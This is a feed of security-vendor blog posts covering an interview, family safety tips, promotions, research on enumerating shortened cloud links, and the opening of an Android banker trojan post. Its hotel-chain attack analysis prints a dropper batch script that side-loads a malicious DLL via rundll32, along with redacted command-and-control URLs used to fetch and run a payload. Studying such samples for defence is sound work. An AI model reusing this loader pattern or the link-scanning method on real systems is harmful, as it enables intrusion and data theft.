Tag Archives: featured1

Panda Security

“Complete security does not exist in any part of life and definitely does not exist on the Internet”

Ten years ago we started celebrating World Information Society Day on May 17th. On this day, we honor the Information Society and the importance of telecommunications by raising awareness about the Internet and its possibilities, as well as other information and communication technologies (ICT). Luis Corrons, technical director of PandaLabs, pointed out some of the Internet’s capabilities for society and business, and gave us some information on how we can reduce digital divide.

 

Panda Security– The majority of traditional media outlets are already on the Internet, what advice do you have for them regarding computer security?

 

Luis Corrons Internet is a communication tool. Online media sites do not differ much from the rest of other websites, so really, the security measures are similar to those of any website belonging to a company in another sector. What they need are reliable systems that provide availability and are fast, but also take safety measures to protect them against possible server attacks. Also, businesses must be extra careful with personal information belonging to their users and/or subscribers.

 

PS– Social Networks are the main catalyst for change when it comes to the way we communicate, also affecting the personal world of an individual. Are privacy and cyber-security connected?

 

LC No, privacy and cyber-security go hand in hand. Social networks and privacy are connected, because they encourage that we abandon our privacy by asking us to share personal information that would have never been public prior to their existence.

There are always those who violate the law by taking advantage of the Internet’s benefits.

 

PS– Internet Day celebrates everyone’s digital freedom: we can decide what to do in a digital environment, how to do it, and to whom. Is this a way for cyber-criminals to intervene?

 

LC– This is similar to the freedom we have walking through the streets of a city. But we are not going to prohibit walking down the street, or allocate pedestrian licenses, or make people check in on every corner so that the authorities know where they are at all times. It is clear that in a free environment there are always those who violate the law by taking advantage of the benefits, like those on the Internet, but we cannot let that be an excuse.

 

PSThe use of the Internet is increasingly widespread. One of the best examples is the number of mobile phones in our country. Do you think we should remind users that their security is in constant danger when browsing the Internet, or do you think that many times it is an exaggeration?

 

LC– Complete security does not exist in any part of life and definitely does not exist on the Internet. But we must not be paranoid. Just as we know that when driving a vehicle the probability of an accident is lower if we follow the rules, we can be reasonably safe if we have taken appropriate measures prior to surfing the web: have software updated and use a dependable security solution for all devices like computers, tablets and Smartphones.

 

PS– Internet is linked to technology. It is connected to TVs, online videos, the Internet of Things… do we communicate better or worse thanks to these technological developments?

 

LC– We communicate easier. Never in the history of mankind have we enjoyed so many options like the ones at our disposal today. With those options we can communicate better or worse… it is debatable. It can be said that there are people who are very faithful to the online world, and are much more isolated from the real world than they would be without the Internet. Do we communicate worse or better? It depends on each person.

 

If security is not present during a company’s digital transformation, it can ruin them.

 

PS– Digital transformation is a mandatory process for companies. What guidelines must be followed to complete this process safely?

 

LC– For those companies who have not already adopted digital transformation, it is probably too late. In any case it is essential that we take into account a company’s security when undertaking a digital project. We can have the best idea in the world, run the project perfectly, and make it a great success, but if security is not present our businesses will sink. Let us remember the damage that was suffered by companies for these type of attacks. Last year, the website Ashley Madison and the Italian company Hacking Team are clear examples of the damage these cyber-attacks can have.

 

PS– “Cloud” services group customer information into a network of specific servers. Do you need extra security to protect them?

 

LC– The fact is, for both the user and for the business, using cloud services actually decreases the work we have to do to protect the information. As much as a company wants to protect their users’ information, who is going to be able to devote more resources to do so than companies like Google or Microsoft? From this point of view it is clear that the information is more secure in the Cloud. However, there are other risks that we cannot forget: if someone were to steal one’s identity they would have access to those services that can be accessed remotely.

 

Remembering to update, protect and distrust are key for navigating the web safely.

 

PS– What minimum precautions should a user take for a safe experience?

 

LC– There are some guidelines that apply to all devices (computers, tablets, Smartphones)

  • Update: always have applications and the operating system updated, in order to patch any known security holes.
  • Protect: Use a security solution to protect us from the millions of attacks that occur on a daily basis.
  • Distrust: Many times, the users themselves cause security problems. We are very confident when we are on the Internet, and cyber-criminals take advantage of this by using the so-called “social engineering techniques”, where they trick us and infect our companies.

 

PS– Technology and cyber-security: what do we see for them in the future?

 

LC– A lot. The Internet of Things are going to fundamentally change the world of cyber-security, with more devices that need protecting every day, from domestic appliances to vehicles, all of them are connected to the Internet. The greatest risk is that many of these newly connected devices were designed without taking into account that they would be connected to the Internet one day. Their manufacturers do not make security a priority. Just imagine that someone “kidnapped” your house using ransomware and does not allow you to leave or enter the house until the ransom is paid. Although this seems like science fiction, we must be well prepared for what lies ahead.

The post “Complete security does not exist in any part of life and definitely does not exist on the Internet” appeared first on Panda Security Mediacenter.

Avast

New feature in Avast Passwords for Android: Fingerprint scanning

Screenshot_20160510-163038.png Screenshot_20160510-163229.png

Avast Passwords gives you easy, secure access to all your passwords, PINs and login credentials.

 

Avast Passwords is an app that helps you to safely store each of your PIN codes, passwords and login details safely in one place. Instead of needing to memorize each of your login credentials, Avast Passwords allows you to keep them together in one secure place and access them safely.

Panda Security

Eight everyday security tips for the whole family

family-EN

From the youngest to the oldest in your household, every member of the family uses the Internet and apps to inform, entertain and maintain contact with their loved ones. This Sunday, May 15th, is International Day of Families and to celebrate, here are some basic tips to keep your family safe while navigating the web.

Updates

Make sure that your operating system and programs or applications are updated properly. Manufacturers often fix vulnerabilities that are appearing, but the only way to make sure your software is “patched-up” is by using the latest version.

Email Attachments

If you get an email that looks suspicious, do not open it until you are sure that the sender is who he claims to be. If you receive unknown messages, do not download the attachments! Even those documents that appear harmless (such as a Word or a spreadsheet) can hide malware. A simple photo might not be what it seems.

Public Wi-Fi

Prevent connecting to public Wi-Fi networks.  Any cyber-delincuent  could use the network as a trap to access your device and steal your information.  If you must use a public network, you should follow these basic security tips.

Online Shopping

While searching for the “best deals” online, we can end up on some unreliable and unknown websites.  Stay away from them! Always verify that the website address matches the webite you are trying to access and that it starts with “https”.  If you always buy on reputable website you will avoid greater evils.

Social Networks

Do not accept friend requests from strangers or allow your children to do so. Try not to share your personal data (like your phone number or address)across platforms like Facebook, Twitter or Instagram, because you can never be certain who is on the other side or spying your conversations. It’s better to be safe than sorry.

Anti-virus

A good anti-virus is the best barrier that you can put between your computer and possible cyber-attackers. Each day, new vulnerabilities are discovered. Only the security experts are aware of them and can update the protection measures when there is a threat.

Parental Control

There are always threats on the network targeted towards young internet users.  Educate the children in your family about proper internet usage and how to recognize unusual behavior.  Teach them what they should do in a difficult situations and always install a good parental control system, like Panda solutions.

Keep Them Little

It is normal, if not inevitable, that your children use social networks or messaging programs like WhatsApp, Snapchat, and Facebook Messenger to speak with their friends. These services can be beneficial or entertaining, but are not 100% danger-free.  Beware of cyber-bullying and the danger-strangers that lurk behind the disguise of a screenname. And for those older members of your family, you should educate them about the dangers of sexting.

 

The post Eight everyday security tips for the whole family appeared first on Panda Security Mediacenter.

Panda Security

The Best Free Tools for your PC

Panda Free

From fashion and flights to technology and innovation, we love to get a good deal.  We get a thrill out of saving money, and it’s even better when it’s free.

There’s a world of freedoms, thanks to popular software and licenses that are offered for free, depending on what interests you. Whether you are a photo-fanatic, music-junkie, or just love a good deal, there are tons of resources at your disposal. There is even software that turns your phone into a digital wallet, in case you want to go wallet less!

The Down Low on the free Downloads

You can perfect and share a multitude of photos using free photo editing software. One of those freebies, PhotoScape, allows us to retouch and perfect all of our digital images in just a couple clicks. Once they’re fixed up, go ahead and share them on your favorite Social Network.

Because of their accessibility, we have become over-consumers of music, TV and movies. We want to use them whenever we want. You can organize and play all of your media using VLC media player, a free and open-source multimedia player that is available for different operating systems in several versions. You are able to watch movies and TV shows, and listen to music. It can be downloaded in the following formats: OGG, FLAC, MKV, MP3, MP4, WMV, MOV.

But, even freebies have imperfections. Companies have been battling to be the internet’s “most downloaded”, as seen with Google Chrome and Internet Explorer´s back and forth battle.  Explorer was recently dethroned as the most-used browser. Regardless of who is in first place, both of these web browsers continue to trail the rest, like Firefox and Safari.

Take care of your PC on a low-cost budget

If we want to take advantage of these tools we must make sure our PCs are running at optimal levels. The free software CCleaner helps us delete useless files, while keeping our PCs clean, optimizing it, and speeding it up!

What about cyber-security? Let’s not forget that hackers take advantage of large security holes in order to attack Internet users. To protect ourselves from the 227,000 new malware samples that have been detected each day this year, we have free solutions like Panda Free Antivirus 2016a great value with Panda´s guarantee. Quality isn´t always costly!

Who said it was expensive to keep your system up-to-date?

The post The Best Free Tools for your PC appeared first on Panda Security Mediacenter.

Panda Security

The danger of shortened links: exposed personal information

enlacesacortados_1Microblogging gives us the freedom to turn our thoughts or our status posts into conversations.  Social networks like Twitter have opened doors for this type of instant communication.  Even shorter than Twitter’s 140 characters is bit.Ly, an insanely popular platform for shrinking long URLs.  But as always, with Bitly’s effectiveness and convenience, comes great security risks.

Most of us are aware that these shortened links have the possibility of being dangerous because… we don’t really know what is behind “the link”.  All we see is a condensed URL (unless we click it).  We need to use a special service to see the original URL before “clicking” it. Browser extensions like Mozilla Firefox’s Unshorten.it (Mozilla Firefox) or Google Chrome’s LongURL were created to make this process easier.

 

Relying on shortened links can be dangerous

 

A recent study published by a group of researchers from the School of Technology at Cornell University in New York has demonstrated that the danger doesn’t only exist in the links themselves, but also, where-in-the-internet they might take you.  There also exists a possible threat to your private information stored in files on the Cloud. The bad guys have gained access to thousands of files in OneDrive, Google Drive and Google Maps from these shortened links.

 

The problem is that these reduced URLs are not only short but also very predictable. They all follow the same structure. It is extremely easy to see hundreds or thousands of possible variants, automatically and in a matter of seconds, by checking to see if the link is directed to a file in the cloud.

 

 

When links fall into the wrong hands

 

“OneDrive URLs have predictable structure.  From the URL to a single shared document (“seed”), one can construct the root URL and automatically traverse the account”, as explained in the study. Following this procedure, researchers have gained access to nearly a million and a half files, “including hundreds of thousands of PDFs and Word documents, spreadsheets, multimedia and executables”.

 

Once the appropriate links are discovered, an attacker could not only access sensitive information contained in the files, but they could also take advantage of the Cloud so they can infect devices like mobiles and desktops. “This means that anyone who randomly scans bit.ly URLs will find thousands of unlocked OneDrive folders and can modify existing files in them or upload arbitrary content, potentially including malware.” This way of distributing malware is worrisome because it is both quick and effective.

 

The post The danger of shortened links: exposed personal information appeared first on Panda Security Mediacenter.

Panda Security

Panda Security named Company of the Year at the 5th Annual “Premios Nacionales El Suplemento”

el-suplemento-pandaPanda Security has been awarded Company of the Year at the 5th Annual “Premios Nacionales El Suplemento“.

Organized by the Spanish newspaper El Suplemento by ABC, at the “Premios Nacionales El Suplemento” well-deserved recognition is given to outstanding businesses and their hardworking professionals, who,  despite the current economy, are boosting their efforts to be better leaders, stepup and grow, on a daily basis.

The gala honored 34 winners, with one winner in each category.  Panda Security was awarded the night’s most coveted prize: Company of the Year. The company joined a group of exceptional winners—highlighting important professionals and Spanish companies, or businesses with headquarters in Spain—who have excelled in different sectors by their innovative work, growth, outreach , and history.

 

el-suplemento-panda-rosa-diaz

Center: Rosa Díaz, the General Director of Panda Security Spain, collected the award on behalf of the Bilbao-based, computer security company.

Although Panda Security is mostly known as an anti-virus software company, it has expanded its line of business to advanced cyber security technology. Rosa Díaz said that, thanks to Adaptive Defense 360, Panda is a pioneer in uniting EPP and EDR systems in the same solution.  The new security model is capable of monitoring, registering and categorizing all active processes on the system.

This year, some of the highlighted winners include Turkish Airlines in the “Airline” category, the NGO Messengers of Peace in “Solidarity”, and Kone for his work in “Sustainability”, among others.

Technological milestones deserve an award

Panda Security is one of the leading manufacturers of security software in the world.  They are included in Truffle 100´s list of Top European Software Vendors.

Among its milestones in technology, the pioneer has also launched security systems with concepts like SaaS (Security as a Service), or the anti-virus that protects from the Cloud (Cloud Computing). Panda is also recognized as the first security service provider to offer daily updates of your database signatures.

Panda Security also introduced the first automatic detection, analysis and classification of malware in real-time for systems.  This is called Collective Intelligence” and, together with patented technology that blocks unknown viruses, is the precursor of Panda´s new security model: Adaptive Defense.

It is our desire that these awards will encourage professionals and companies to continue their innovation, outreach and in good practices.

 

Congratulations to all the winners!

The post Panda Security named Company of the Year at the 5th Annual “Premios Nacionales El Suplemento” appeared first on Panda Security Mediacenter.

Avast

Andromeda distributors craft new strategies for attacks

Most of popular botnet Andromeda’s (also known as Gamarue) distribution channels have been discovered and analyzed by antivirus vendors. This has forced Andromeda’s distributors to come up with a new attack strategy to continue to drop Andromeda binaries onto PCs.

Meanwhile at the Andromeda headquarters…

Operator: “Captain, all of our distribution channels have been discovered!”

Captain: “Report the loss..”

Operator: “Email scams, exploit kits, everything is known to the public.”

Captain: “Operator, let’s start with plan N!”

Operator: “Roger that, captain”

Before we dive into Andromeda’s new tactic, I’d recommend you to read this article by fellow security researchers from Stormshield, which describes one of Andromeda’s most recent phishing campaigns. We have observed similar Andromeda email phishing campaigns. Most of the emails we have seen seem to be targeting Germans and Italians. However, these two target groups seem to be too clever to fall for the bait, as they are not the top infected users.

Some of the popular subject lines used to target Germans and Italians are “Your current bill” and “A nude photo of you has appeared on the Internet”.

andmail.png

Panda Security

Panda Security, the tested anti-virus

antivirus panda security

Be careful! Not all anti-virus systems are what they seem and many are more hazardous than helpful for your cyber security, so was said in a recent investigation.  The investigation concluded that, today, most anti-virus’ tend to lower the threshold of Internet browser security.  Can they protect us against external threats?  How effective are they?

Traditionally, browsers incorporate tools to check certificates issued by websites to ensure that it has been issued by an appropriate entity. Panda Security’s products do not use interception techniques like intrusive man-in-the-middle through TLS proxies, to analyze our customers’ communications. Our solutions are completely transparent and do not install any type of certificate for this function. Thanks to this we can avoid these type of vulnerabilities, while minimizing the impact on the communication performance for our users’ devices. For this reason, Panda solutions are not included in the study.

Panda Antivirus, the “nonvulnerable”

Panda’s products are mentioned as those not affected by this vulnerability in Concordia University’s report.

The affected anti-virus systems in the study trick browsers, causing them to relax and trust any certificate, even though they shouldn´t. On the contrary, Panda Security solutions appears in this report because of its transparency and reliability for its users.

The post Panda Security, the tested anti-virus appeared first on Panda Security Mediacenter.

Panda Security

Advanced Attacks against Hotel Chains: A practical example

Recently, we published a report where we discussed the numerous attacks on major hotel chains. The attacks were directed mainly towards credit card theft. Attackers do this by infecting point-of-sale terminals in these types of establishments. A few days ago, one of our Adaptive Defense 360 clients, a luxury hotel chain, suffered an attack. I wanted to take advantage of this opportunity to show how cyber-criminals are entering company networks.

We know that, in most cases, these types of attacks are initiated through an email with an attached file that compromises the victim’s computer, or a link to a page that uses vulnerabilities to achieve the attacker’s objective. In our client’s case, the attack began with an email message addressed to a hotel employee stating the attachment provided all the information needed to pay for a hotel stay at the end of May 2016.

The message contained a zipped file attachment, which when opened contained a file with a Microsoft Word icon. When the file was executed, it showed the following:

advanced attacks hotels

This is a hotel reservation form that is to be filled out by a customer. They wrote their payment information for a stay at the end of May 2016. As you can see, it does not appear unusual. In fact, this document is identical to those that this hotel employee sends to his customers (even the name is the same), but if we look closely, we will see that the file comes from a zip. Despite that the Word icon shows up, it is an executable file.

When you run it, three files are created on the disk and the first one runs:

– reader_sl.cmd

– ROCA.ING.docx

– adobeUpd.dll (MD5: A213E36D3869E626D4654BCE67F6760C)

The contents of the first file is shown below:

@echo off

start “” ROCA.ING.docx

Set xOS=x64

If “%PROCESSOR_ARCHITECTURE%”==”x86” If Not Defined PROCESSOR_ARCHITEW6432 Set xOS=x86

IF “%xOS%” == “x64” (start “” C:WindowsSysWOW64rundll32.exe adobeUpd.dll,Wenk)

IF “%xOS%” == “x86” (start “” C:WindowsSystem32rundll32.exe adobeUpd.dll,Wenk)

ping -n 12 localhost

As we can see, the first thing it does to its victim is open the Word document in order to run and complete the trick. Then, adobeUpd.dll runs with the parameter “Wenk”. While executed, it modifies the file and marks it as read-only and hidden, and creates an entry in the Windows registry that runs every time the computer is turned on.

Contact with a specific URL:

http://www.************.ga/en/scripts/en.php?stream=lcc&user=iPmbzfAIRMFw

Then it downloads a file that contains the user of the given URL parameter (iPmbzfAIRMFw). In the event of a match, it attempts to download the file

http://www.************.ga/en/scripts/iPmbzfAIRMFw.jpg

When we try to download it, it is not available; it will not be in our customer system either, as we blocked the infection attempt and the malware was not able to run there. The domain of the URL is exactly the same domain as our customer, except that they have “.com” while the attackers registered a domain with the same name but in Gabon (“.ga”). This way, the similarity to the domain name won’t attract attention if it is seen by the hotel’s security team when analyzing network traffic.

In spite of the fact that the file iPmbzfAIRMFw.jpg is not available, if we look at the code adobeUpd.dll we can see that they are actually looking for a specific mark in this file, then it decrypts the data from it and runs it as a PE (created as “Tempsystm”).

Subsequently, adobeUpd.dll remains in a loop, randomly connecting every several minutes to:

http://www.************.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm

As we see, this attack is specifically directed to this hotel chain. The criminals have already removed all traces of the server where you could connect to the malware, and as we aborted the attack we can only speculate what is what they were going to do next. In our experience, this type of attacks seeks to engage a team of the enterprise of the victim to then move laterally to reach its ultimate goal: the point-of-sale terminals that process the credit card payments, as we have seen in so many other cases.

The traditional anti-virus does not work against this type of attack, since they are threats created specifically for a victim and they always ensure that the malware is not detected by signatures, proactive technologies, etc. that current anti-malware solutions have built. That is why have EDR type of services (Endpoint Detection & Response) are equipped with advanced protection technology, something vital for effective protection against these attacks.

The post Advanced Attacks against Hotel Chains: A practical example appeared first on Panda Security Mediacenter.

Avast

Android Banker Trojan preys on credit card information

An Android Trojan is spying on its victims and even tricking some into giving up their credit card information.

Most of today’s malware authors create malware for one of two reasons: either to make money or to steal valuable data. In this blog post, we will show how an Android Trojan relies on social engineering. Social engineering tactics are used to trick people into performing an action, like clicking on a link or downloading an application. The person being tricked thinks they are doing something innocent when they are really clicking on or downloading something malicious. This malware is associated with the banker family as it tries to steal user’s credit card information.

Once installed, the Banker Trojan puts an icon in the launcher.The app name shown with the icon can vary from sample to sample — some of the names we have seen were : AVITO-MMS, KupiVip and MMS Центр (MMS Center).